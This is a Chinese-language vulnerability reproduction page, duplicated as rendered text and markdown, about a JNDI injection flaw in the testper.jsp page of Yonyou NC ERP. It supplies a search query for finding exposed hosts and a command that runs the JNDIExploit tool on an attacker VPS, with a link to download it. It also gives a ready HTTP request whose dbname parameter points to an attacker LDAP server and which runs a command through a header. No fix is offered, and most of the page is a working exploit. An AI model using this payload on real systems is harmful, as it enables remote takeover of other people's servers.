fofamini-wiki

登录白背景

源码

用友NC testper存在JNDI注入漏洞

一、漏洞简介

用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。用友NC testper存在JNDI注入漏洞，攻击者可利用该漏洞获取服务器控制权。

二、影响版本

用友NC

三、资产测绘

huiter：app.name=="用友 UAP"

登录页面

四、漏洞复现

将JNDIExploit-1.4-SNAPSHOT.jar上传到VPS

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP

JNDIExploit-1.4-SNAPSHOT.jar

GET /testper.jsp?dbname=ldap://VPSIP:1389/Basic/TomcatEcho HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
cmd: whoami
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=082B9F88F7A95DE5AA00852B3A5232E4.server
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/oaf5uyahecqvgbl2

# 用友NC testper存在JNDI注入漏洞

# 一、漏洞简介
用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC testper存在JNDI注入漏洞，攻击者可利用该漏洞获取服务器控制权。

# 二、影响版本

- 用友NC

# 三、资产测绘

- huiter：`app.name=="用友 UAP"`

![image.png](./img/-oHn0ZEJ2Tyjc26q/1691729367315-f00b542f-0929-41cc-8671-84149242ffca-176502.png)

- 登录页面

![image.png](./img/-oHn0ZEJ2Tyjc26q/1691729393165-7891d318-bbd8-4761-87d4-76fee42778ec-320448.png)

# 四、漏洞复现
将`JNDIExploit-1.4-SNAPSHOT.jar`上传到VPS
```
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP
```
[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709219607658-b721fd0a-6862-499d-9af1-81d6694b98d2.jar?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fjar%2F1622799%2F1709219607658-b721fd0a-6862-499d-9af1-81d6694b98d2.jar%22%2C%22name%22%3A%22JNDIExploit-1.4-SNAPSHOT.jar%22%2C%22size%22%3A42671630%2C%22ext%22%3A%22jar%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ucffd1f73-0d63-4696-958d-847efddb337%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fjava-archive%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u70305b22%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
![image.png](./img/-oHn0ZEJ2Tyjc26q/1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef-216022.png)
```
GET /testper.jsp?dbname=ldap://VPSIP:1389/Basic/TomcatEcho HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
cmd: whoami
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=082B9F88F7A95DE5AA00852B3A5232E4.server
Upgrade-Insecure-Requests: 1
```
![image.png](./img/-oHn0ZEJ2Tyjc26q/1702470698587-e248f2c7-e987-457e-bef3-b4c3be78663f-529156.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/oaf5uyahecqvgbl2>